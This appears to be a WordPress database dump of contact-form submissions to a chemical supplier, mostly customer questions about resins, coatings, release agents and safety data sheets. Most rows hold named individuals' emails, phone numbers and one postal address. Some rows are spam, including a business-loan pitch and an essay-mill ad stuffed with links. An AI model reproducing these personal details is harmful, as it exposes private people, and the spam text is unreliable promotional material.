INSERT INTO `wp_postmeta` VALUES (40777, 4731, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40778, 4731, '_seq_num', '338'); 
INSERT INTO `wp_postmeta` VALUES (40779, 4731, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40780, 4731, '_field_12', 'Brian Link'); 
INSERT INTO `wp_postmeta` VALUES (40781, 4731, '_field_13', 'GE Power'); 
INSERT INTO `wp_postmeta` VALUES (40782, 4731, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40783, 4731, '_field_14', 'brian.link@ge.com'); 
INSERT INTO `wp_postmeta` VALUES (40784, 4731, '_field_15', '(720) 622-0177'); 
INSERT INTO `wp_postmeta` VALUES (40785, 4731, '_field_16', 'Need a quick drying conformal coat or adhesive that can be in contact with water and fil a very small cavity.\n\nThanks\nBrian Link'); 
INSERT INTO `wp_postmeta` VALUES (40786, 4731, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40787, 4731, '_sub_id', '4731'); 
INSERT INTO `wp_postmeta` VALUES (40788, 4732, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40789, 4732, '_seq_num', '339'); 
INSERT INTO `wp_postmeta` VALUES (40790, 4732, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40791, 4732, '_field_12', 'Dane Hartman'); 
INSERT INTO `wp_postmeta` VALUES (40792, 4732, '_field_13', 'Arizona polymer Flooring'); 
INSERT INTO `wp_postmeta` VALUES (40793, 4732, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40794, 4732, '_field_14', 'dane.hartman@apfepoxy.com'); 
INSERT INTO `wp_postmeta` VALUES (40795, 4732, '_field_15', '(623) 435-2277'); 
INSERT INTO `wp_postmeta` VALUES (40796, 4732, '_field_16', 'Had questions regarding the VAZO products and the possibility of getting them supplied pre-dispersed in solution for added stability. Our production facility is located in Phoenix Az and obviously heat and thermal decomposition of the Azo molecules are a serious concern. Also had questions regarding price and availability. '); 
INSERT INTO `wp_postmeta` VALUES (40797, 4732, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40798, 4732, '_sub_id', '4732'); 
INSERT INTO `wp_postmeta` VALUES (40799, 4733, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40800, 4733, '_seq_num', '832'); 
INSERT INTO `wp_postmeta` VALUES (40801, 4733, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40802, 4733, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40803, 4733, '_field_1', 'BusinessFunds365'); 
INSERT INTO `wp_postmeta` VALUES (40804, 4733, '_field_10', 'http://BusinessFunds365.com'); 
INSERT INTO `wp_postmeta` VALUES (40805, 4733, '_field_2', 'fundingteam+miller-stephenson.com@businessfunds365.com'); 
INSERT INTO `wp_postmeta` VALUES (40806, 4733, '_field_8', '755-978-752'); 
INSERT INTO `wp_postmeta` VALUES (40807, 4733, '_field_3', 'Hi, letting you know that http://BusinessFunds365.com can find your business a SBA or private loan for $2,000 - $350K Without high credit or collateral. \r\n \r\nFind Out how much you qualify for here: \r\n \r\nhttp://BusinessFunds365.com/i.php?url=miller-stephenson.com&amp;id=e76 \r\n \r\nMinimum requirements include your company being established for at least a year and with current gross revenue of at least 120K. Eligibility and funding can be completed in as fast as 48hrs. Terms are personalized for each business so I suggest applying to find out exactly how much you can get on various terms. \r\n \r\nThis is a free service from a qualified lender and the approval will be based on the annual revenue of your business. These funds are Non-Restrictive, allowing you to spend the full amount in any way you require including business debt consolidation, hiring, marketing, or Absolutely Any Other expense. \r\n \r\nIf you need fast and easy business funding take a look at these programs now as there is limited availability. \r\n \r\nClick Here: http://BusinessFunds365.com/i.php?id=e76 \r\n \r\nHave a great day, \r\nThe Business Funds 365 Team \r\n \r\nunsubscribe/remove - http://businessfunds365.com/r.php?url=miller-stephenson.com&amp;id=e76'); 
INSERT INTO `wp_postmeta` VALUES (40808, 4733, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40809, 4733, '_sub_id', '4733'); 
INSERT INTO `wp_postmeta` VALUES (40810, 4734, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40811, 4734, '_seq_num', '833'); 
INSERT INTO `wp_postmeta` VALUES (40812, 4734, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40813, 4734, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40814, 4734, '_field_1', 'Elaine Powell'); 
INSERT INTO `wp_postmeta` VALUES (40815, 4734, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (40816, 4734, '_field_2', 'powellelaine159@ymail.com'); 
INSERT INTO `wp_postmeta` VALUES (40817, 4734, '_field_8', '(608) 369-2478'); 
INSERT INTO `wp_postmeta` VALUES (40818, 4734, '_field_3', 'Which sort of resin should I use?  I have put vinyl tile on my kitchen counter top and wish to seal it.'); 
INSERT INTO `wp_postmeta` VALUES (40819, 4734, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40820, 4734, '_sub_id', '4734'); 
INSERT INTO `wp_postmeta` VALUES (40821, 4735, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40822, 4735, '_seq_num', '834'); 
INSERT INTO `wp_postmeta` VALUES (40823, 4735, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40824, 4735, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40825, 4735, '_field_1', 'Girish patel'); 
INSERT INTO `wp_postmeta` VALUES (40826, 4735, '_field_10', 'german industries'); 
INSERT INTO `wp_postmeta` VALUES (40827, 4735, '_field_2', 'germanind91@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (40828, 4735, '_field_8', '(990) 970-9191'); 
INSERT INTO `wp_postmeta` VALUES (40829, 4735, '_field_3', 'gfgjbjb'); 
INSERT INTO `wp_postmeta` VALUES (40830, 4735, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40831, 4735, '_sub_id', '4735'); 
INSERT INTO `wp_postmeta` VALUES (40832, 4736, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40833, 4736, '_seq_num', '835'); 
INSERT INTO `wp_postmeta` VALUES (40834, 4736, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40835, 4736, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40836, 4736, '_field_1', 'Alexander Quick'); 
INSERT INTO `wp_postmeta` VALUES (40837, 4736, '_field_10', 'Nanoscribe GmbH, Germany'); 
INSERT INTO `wp_postmeta` VALUES (40838, 4736, '_field_2', 'quick@nanoscribe.com'); 
INSERT INTO `wp_postmeta` VALUES (40839, 4736, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40840, 4736, '_field_3', 'Dear Madam /Sir,\nI have browsed your website (especially the epon epoxy resin section) with great interest, as we are thinking about developing an UV-curable resin for our device (3D Printer). The resin should consist of a multifunctional epoxy compound (the more epoxides per molecule, the better) and an onium salt. The final resin should be a liquid and should not contain any solvents. Viscosity can be rather high. \nI was thinking of mixing Epon SU-8 with heloxy-68 (alternatively Epon resin 828 or 862). Can you recommend any onium salts that are soluble in the mentioned compounds?\nAlternatively, do you already sell a mixture that would meet my specifications (maybe apart from the onium salt)?\nBest regards,\nAlexander Quick '); 
INSERT INTO `wp_postmeta` VALUES (40841, 4736, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40842, 4736, '_sub_id', '4736'); 
INSERT INTO `wp_postmeta` VALUES (40843, 4737, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40844, 4737, '_seq_num', '836'); 
INSERT INTO `wp_postmeta` VALUES (40845, 4737, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40846, 4737, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40847, 4737, '_field_1', 'Dan Carpenter'); 
INSERT INTO `wp_postmeta` VALUES (40848, 4737, '_field_10', 'CertainTeed'); 
INSERT INTO `wp_postmeta` VALUES (40849, 4737, '_field_2', 'danc@simtekfence.com'); 
INSERT INTO `wp_postmeta` VALUES (40850, 4737, '_field_8', '(801) 655-5236'); 
INSERT INTO `wp_postmeta` VALUES (40851, 4737, '_field_3', 'I work for a rotational molding company that currently uses Stoner P441 Mold Heavy Duty Release Agent and we are looking for alternatives due to EHS concerns.  I was not able to find an SDS on the ReleaSys RM product in the SDS section of this website.  Could I receive one? Also, if this is something we want to pursue, would it be possible to receive a sample?  Email preferred. Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (40852, 4737, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40853, 4737, '_sub_id', '4737'); 
INSERT INTO `wp_postmeta` VALUES (40854, 4738, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40855, 4738, '_seq_num', '340'); 
INSERT INTO `wp_postmeta` VALUES (40856, 4738, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40857, 4738, '_field_12', 'Tyler'); 
INSERT INTO `wp_postmeta` VALUES (40858, 4738, '_field_13', 'Electro Impulse'); 
INSERT INTO `wp_postmeta` VALUES (40859, 4738, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40860, 4738, '_field_14', 'tk@electroimpulse.com'); 
INSERT INTO `wp_postmeta` VALUES (40861, 4738, '_field_15', '(732) 776-5800'); 
INSERT INTO `wp_postmeta` VALUES (40862, 4738, '_field_16', 'Good morning,\r\n\r\nWe use your EPON Resin 828 and EPIKURE 3140 along with the Heloxy 71 flex modifier.  In our process after we apply a coating of the epoxy we let it dry and then overcoat it with a black flex seal to provide a uniform look and an additional seal.  I was wondering if there is a specific cure time the epoxy needs before we can coat it? Would coating it too early with the flex seal prevent the epoxy from fully curing?\r\n\r\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (40863, 4738, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40864, 4738, '_sub_id', '4738'); 
INSERT INTO `wp_postmeta` VALUES (40865, 4739, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40866, 4739, '_seq_num', '837'); 
INSERT INTO `wp_postmeta` VALUES (40867, 4739, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40868, 4739, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40869, 4739, '_field_1', 'Robert Bentley'); 
INSERT INTO `wp_postmeta` VALUES (40870, 4739, '_field_10', 'Doosan Fuel Cell America'); 
INSERT INTO `wp_postmeta` VALUES (40871, 4739, '_field_2', 'rob.bentley@doosan.com'); 
INSERT INTO `wp_postmeta` VALUES (40872, 4739, '_field_8', '(860) 394-6832'); 
INSERT INTO `wp_postmeta` VALUES (40873, 4739, '_field_3', 'Please can I get a sample of your 3 high temperature release agents. I am looking for something to help a Graphite/FEP mix not stick to steel plates when heated to 550F for 60 mins in a 300 Ton press.\n\nAddress is:\nDoosan Fuel Cell America\n195 Governors Hgwy\nSouth Windsor CT 06074'); 
INSERT INTO `wp_postmeta` VALUES (40874, 4739, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40875, 4739, '_sub_id', '4739'); 
INSERT INTO `wp_postmeta` VALUES (40876, 4740, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40877, 4740, '_seq_num', '838'); 
INSERT INTO `wp_postmeta` VALUES (40878, 4740, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40879, 4740, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40880, 4740, '_field_1', 'Syed Jamal'); 
INSERT INTO `wp_postmeta` VALUES (40881, 4740, '_field_10', 'Circor Aerospace'); 
INSERT INTO `wp_postmeta` VALUES (40882, 4740, '_field_2', 'syed.jamal@circor.com'); 
INSERT INTO `wp_postmeta` VALUES (40883, 4740, '_field_8', '(631) 863-4926'); 
INSERT INTO `wp_postmeta` VALUES (40884, 4740, '_field_3', 'Please provide leadtime for below items\n\nCHEMICAL NAME/PART#	MANUFACTURER 	DESCRIPTION/NAME\nMS722	MILLER STEPHENSON	VERTREL MCA PLUS MS-772 HEAVY DUTY SOLVENT &amp; FLUX REMOVER\nMS-470C	MILLER STEPHENSON	URETHANE CONFORAL COATING MS-470C\nEPIKURE 3125	MILLER STEPHENSON	EPIKURE 3125 CURING AGENT HEXION\nEPON RESIN 828	MILLER STEPHENSON	EPON 828 RESIN HEXION\nMS-755	MILLER STEPHENSON	VERTREL SMT HD SOLVENT &amp; FLUX REMOVER MS-755\nMS-122AD	MILLER STEPHENSON	PTFE RELEASE AGENT DRY LUBRICANT\n'); 
INSERT INTO `wp_postmeta` VALUES (40885, 4740, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40886, 4740, '_sub_id', '4740'); 
INSERT INTO `wp_postmeta` VALUES (40887, 4741, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40888, 4741, '_seq_num', '839'); 
INSERT INTO `wp_postmeta` VALUES (40889, 4741, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40890, 4741, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40891, 4741, '_field_1', 'Ted Wondra'); 
INSERT INTO `wp_postmeta` VALUES (40892, 4741, '_field_10', 'Kato Engineering'); 
INSERT INTO `wp_postmeta` VALUES (40893, 4741, '_field_2', 'ted.wondra@mail.nidec.com'); 
INSERT INTO `wp_postmeta` VALUES (40894, 4741, '_field_8', '(507) 345-2746'); 
INSERT INTO `wp_postmeta` VALUES (40895, 4741, '_field_3', 'Hello. We have used Famous Lubricants Y510 masking grease for probably 40 years to mask off void and bolt holes, etc prior to putting our generators in a vacuum resin impregnation process. Do you have a product that could be used in place of the Y510. Our safety concern is for a product to have a high flash point to not be very volatile.  Thanks for your assistance. \nTed Wondra\nBuyer - Kato Engineering '); 
INSERT INTO `wp_postmeta` VALUES (40896, 4741, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40897, 4741, '_sub_id', '4741'); 
INSERT INTO `wp_postmeta` VALUES (40898, 4742, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40899, 4742, '_seq_num', '840'); 
INSERT INTO `wp_postmeta` VALUES (40900, 4742, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40901, 4742, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40902, 4742, '_field_1', 'Deven Calderon'); 
INSERT INTO `wp_postmeta` VALUES (40903, 4742, '_field_10', 'Moore Industries '); 
INSERT INTO `wp_postmeta` VALUES (40904, 4742, '_field_2', 'dcalderon@miinet.com'); 
INSERT INTO `wp_postmeta` VALUES (40905, 4742, '_field_8', '(818) 894-7111'); 
INSERT INTO `wp_postmeta` VALUES (40906, 4742, '_field_3', 'Good Afternoon,\n\nCan you please provide me with a digital SDS for the following  products you guys have, &quot;MS-725&quot; &amp; &quot;MS-755&quot;; I would greatly appreciate it. \n\nThank you\nDeven'); 
INSERT INTO `wp_postmeta` VALUES (40907, 4742, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40908, 4742, '_sub_id', '4742'); 
INSERT INTO `wp_postmeta` VALUES (40909, 4743, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40910, 4743, '_seq_num', '841'); 
INSERT INTO `wp_postmeta` VALUES (40911, 4743, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40912, 4743, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40913, 4743, '_field_1', 'Julio Cancio'); 
INSERT INTO `wp_postmeta` VALUES (40914, 4743, '_field_10', 'Job Mix Concrete'); 
INSERT INTO `wp_postmeta` VALUES (40915, 4743, '_field_2', 'julio@jobmixconcrete.com'); 
INSERT INTO `wp_postmeta` VALUES (40916, 4743, '_field_8', '(305) 216-0929'); 
INSERT INTO `wp_postmeta` VALUES (40917, 4743, '_field_3', 'I have steel Bin block molds and I need an agent that will stop concrete from getting stuck on metal molds  Please advise if you have this product and how can we get a sample. Thank you'); 
INSERT INTO `wp_postmeta` VALUES (40918, 4743, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40919, 4743, '_sub_id', '4743'); 
INSERT INTO `wp_postmeta` VALUES (40920, 4744, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40921, 4744, '_seq_num', '842'); 
INSERT INTO `wp_postmeta` VALUES (40922, 4744, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40923, 4744, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40924, 4744, '_field_1', 'EssaySaitoEA'); 
INSERT INTO `wp_postmeta` VALUES (40925, 4744, '_field_10', 'google'); 
INSERT INTO `wp_postmeta` VALUES (40926, 4744, '_field_2', 'services@plitkagranit.com'); 
INSERT INTO `wp_postmeta` VALUES (40927, 4744, '_field_8', '89574686993'); 
INSERT INTO `wp_postmeta` VALUES (40928, 4744, '_field_3', '&lt;a href=&quot;http://bit.ly/2uOZjRP&quot;&gt;&lt;img&gt;http://plitkagranit.com/CustomWriting.gif&lt;/img&gt;&lt;/a&gt; \r\n \r\nBest Custom Writing Service: persuasive essay writing for any topic! 25% Discount For Your Orders - WPMMEFY2237  &lt;b&gt;&lt;a href=&quot;http://bit.ly/2uOZjRP&quot;&gt;ORDER&lt;/a&gt;&lt;/b&gt; \r\n \r\nIf you&#039;re like many of our clients, you&#039;re here because you&#039;re a busy student who needs an extra set of hands. With so many disconnected, multifaceted, and unreasonable expectations on you, it can be hard, if not impossible, to get assignment writing done on time. The difference is in our best custom writing assignments. We don&#039;t have a library of papers we sell, nor do we apply a one-size-fits-all treatment of our clients. We make sure that customized essays we provide fully match your instructions. We consider each assignment and student individually and treat it as if it were our own. Our experts take time searching for relevant information to present high-quality customized essays. \r\n \r\n&lt;a href=&quot;http://bit.ly/2uOZjRP&quot;&gt;&lt;img&gt;http://plitkagranit.com/Essay.jpg&lt;/img&gt;&lt;/a&gt; \r\n \r\nKey Tags: best writing service essay writing service india automated essay evaluation the criterion online writing service born buy juliet schor essay help with dissertation writing dissertation abstract cheap essay help essay writing help online buying papers online cheap term paper for sale chronological order essays the help by kathryn stockett essay buy theology research paper essay proofreading services essay writing order of importance essay writing services usa essay writers toronto uk dissertation writing research thesis dissertation editing help writing college essay essay about military service has anyone used a dissertation writing service order of authors in research paper custom essay writing company custom term paper writing thesis papers for sale cheap term papers online'); 
INSERT INTO `wp_postmeta` VALUES (40929, 4744, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40930, 4744, '_sub_id', '4744'); 
INSERT INTO `wp_postmeta` VALUES (40931, 4745, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40932, 4745, '_seq_num', '843'); 
INSERT INTO `wp_postmeta` VALUES (40933, 4745, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40934, 4745, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40935, 4745, '_field_1', 'Sabrina Van Themsche'); 
INSERT INTO `wp_postmeta` VALUES (40936, 4745, '_field_10', 'De Beers Group'); 
INSERT INTO `wp_postmeta` VALUES (40937, 4745, '_field_2', 'sabrina.vanthemsche@debeersgroup.com'); 
INSERT INTO `wp_postmeta` VALUES (40938, 4745, '_field_8', '(416) 645-1710'); 
INSERT INTO `wp_postmeta` VALUES (40939, 4745, '_field_3', 'We are looking for a supplier for Dupont Vertrel Sion. Do you have this product?'); 
INSERT INTO `wp_postmeta` VALUES (40940, 4745, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40941, 4745, '_sub_id', '4745'); 
INSERT INTO `wp_postmeta` VALUES (40942, 4747, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40943, 4747, '_seq_num', '341'); 
INSERT INTO `wp_postmeta` VALUES (40944, 4747, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40945, 4747, '_field_12', 'Bob Schiesser'); 
INSERT INTO `wp_postmeta` VALUES (40946, 4747, '_field_13', 'Eaton Corp'); 
INSERT INTO `wp_postmeta` VALUES (40947, 4747, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40948, 4747, '_field_14', 'RobertASchiesser@Eaton.com'); 
INSERT INTO `wp_postmeta` VALUES (40949, 4747, '_field_15', '(203) 796-6072'); 
INSERT INTO `wp_postmeta` VALUES (40950, 4747, '_field_16', 'can you tell me the difference in the MS-470N and MS-470C Aerosol conformal coatings?  I need to justify a change to a customer, going form N to C.'); 
INSERT INTO `wp_postmeta` VALUES (40951, 4747, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40952, 4747, '_sub_id', '4747'); 
INSERT INTO `wp_postmeta` VALUES (40953, 4748, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (40954, 4748, '_seq_num', '342'); 
INSERT INTO `wp_postmeta` VALUES (40955, 4748, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40956, 4748, '_field_12', 'Zayyan Chowdhury'); 
INSERT INTO `wp_postmeta` VALUES (40957, 4748, '_field_13', 'Miller-Stephenson Chemical Co.'); 
INSERT INTO `wp_postmeta` VALUES (40958, 4748, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (40959, 4748, '_field_14', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (40960, 4748, '_field_15', '(203) 743-4447'); 
INSERT INTO `wp_postmeta` VALUES (40961, 4748, '_field_16', 'asdasd'); 
INSERT INTO `wp_postmeta` VALUES (40962, 4748, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (40963, 4748, '_sub_id', '4748'); 
INSERT INTO `wp_postmeta` VALUES (40964, 4749, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40965, 4749, '_seq_num', '844'); 
INSERT INTO `wp_postmeta` VALUES (40966, 4749, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40967, 4749, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40968, 4749, '_field_1', 'Test Dan'); 
INSERT INTO `wp_postmeta` VALUES (40969, 4749, '_field_10', 'test'); 
INSERT INTO `wp_postmeta` VALUES (40970, 4749, '_field_2', 'test@test.com'); 
INSERT INTO `wp_postmeta` VALUES (40971, 4749, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (40972, 4749, '_field_3', 'test'); 
INSERT INTO `wp_postmeta` VALUES (40973, 4749, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40974, 4749, '_sub_id', '4749'); 
INSERT INTO `wp_postmeta` VALUES (40975, 4750, '_wp_attached_file', '2016/08/krytox-lvp-grease-properties.jpg'); 
INSERT INTO `wp_postmeta` VALUES (40976, 4750, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:576;s:6:"height";i:784;s:4:"file";s:40:"2016/08/krytox-lvp-grease-properties.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:40:"krytox-lvp-grease-properties-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:40:"krytox-lvp-grease-properties-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:40:"krytox-lvp-grease-properties-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:40:"krytox-lvp-grease-properties-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:40:"krytox-lvp-grease-properties-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:83;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (40977, 4751, '_wp_attached_file', '2016/08/krytox-lvp-grease-properties-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (40978, 4751, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:576;s:6:"height";i:784;s:4:"file";s:42:"2016/08/krytox-lvp-grease-properties-1.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"krytox-lvp-grease-properties-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"krytox-lvp-grease-properties-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"krytox-lvp-grease-properties-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"krytox-lvp-grease-properties-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"krytox-lvp-grease-properties-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:83;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (40979, 4752, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40980, 4752, '_seq_num', '845'); 
INSERT INTO `wp_postmeta` VALUES (40981, 4752, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40982, 4752, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40983, 4752, '_field_1', '彭春艳'); 
INSERT INTO `wp_postmeta` VALUES (40984, 4752, '_field_10', '诺特电子（东莞）有限公司'); 
INSERT INTO `wp_postmeta` VALUES (40985, 4752, '_field_2', 'vivian.peng@note.eu'); 
INSERT INTO `wp_postmeta` VALUES (40986, 4752, '_field_8', '076987290991'); 
INSERT INTO `wp_postmeta` VALUES (40987, 4752, '_field_3', 'hi \r\n\r\ncan you gave me ms-262 TDS and MSDS ?thanks!'); 
INSERT INTO `wp_postmeta` VALUES (40988, 4752, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (40989, 4752, '_sub_id', '4752'); 
INSERT INTO `wp_postmeta` VALUES (40990, 4753, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (40991, 4753, '_seq_num', '846'); 
INSERT INTO `wp_postmeta` VALUES (40992, 4753, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (40993, 4753, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (40994, 4753, '_field_1', 'SlavianaBeinyQY'); 
INSERT INTO `wp_postmeta` VALUES (40995, 4753, '_field_10', 'google'); 
INSERT INTO `wp_postmeta` VALUES (40996, 4753, '_field_2', '11111@plitkagranit.com'); 
INSERT INTO `wp_postmeta` VALUES (40997, 4753, '_field_8', '81412669564'); 
